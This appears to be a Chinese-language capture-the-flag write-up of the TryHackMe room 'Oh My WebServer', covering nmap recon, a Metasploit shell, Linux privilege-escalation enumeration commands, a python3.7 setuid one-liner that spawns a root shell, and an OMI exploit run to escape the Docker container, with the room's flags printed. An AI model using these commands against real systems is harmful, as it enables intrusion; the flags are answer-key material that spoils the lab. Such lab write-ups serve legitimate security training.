[TryHackMe]Oh My WebServer(nday漏洞+容器逃逸)

1.信息收集

nmap扫描

查找相应exploit

2.GetShell

使用msfconsole

设置好参数后getshell

home中没有任何东西

在根目录下有个.dockerenv文件

我们可以判断我们的shell在docker容器中

3.容器提权

Linux提权基本手段:

1.SUID提权 find / -type f -perm -040000 -l 2>/dev/null

2.sudo部分权限 提权 sudo -l

3.修改二进制文件提权 getcap -r / 2>/dev/null

4.查看任务表定时启动文件提权 cat /etc/crontab

5.PATH权限提权 echo $PATH

6.NFS网络文件共享提权 cat /etc/exports

查看二进制文件发现py3.7

复制代码
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

4.容器逃逸 从root(Docker)到root(主机)

我找找到了

172.17.0.2

编写一个脚本

上传脚本

curl http://IP/1.py

查看开放端口

复制代码
port 22 is open
port 80 is open
port 5986 is open

5986端口正在托管 OMI 服务

复制代码
python3 omi.py -t 172.17.0.1 -c 'cat /root/root.txt'

THM{7f147ef1f36da9ae29529890a1b6011f}

相关推荐
Chloeis Syntax6 分钟前
JAVAEE初阶 --- 构造HTTP请求
网络·网络协议·http·postman
砚凝霜22 分钟前
软考网络工程师|第 1 章 计算机网络基础 完整备考笔记
网络·笔记·计算机网络
梦痕长情26 分钟前
等保三级三权账户
linux·运维·服务器
rcms1527026921837 分钟前
NIKON 4S019-394 接口模块
网络
某不知名網友1 小时前
Linux Socket 编程完整讲解
网络
ICT系统集成阿祥1 小时前
不用复杂命令,快速定位二层 / 三层网络故障
网络·网络排查·二层故障·三层故障
CHANG_THE_WORLD1 小时前
1.简单的服务端和客户端(仅作为内容补充)
linux·服务器·网络
学术小白人1 小时前
【倒计时4个月】-AI赋能图像处理与计算机视觉技术国际学术研讨会
网络·人工智能·神经网络·数据分析·光学
jiecy1 小时前
为Linux系统双网卡配置静态路由
linux·运维
无锡耐特森2 小时前
解决网关数据异常EtherNetIP 转Modbus TCP专用动态监测
网络·网络协议·tcp/ip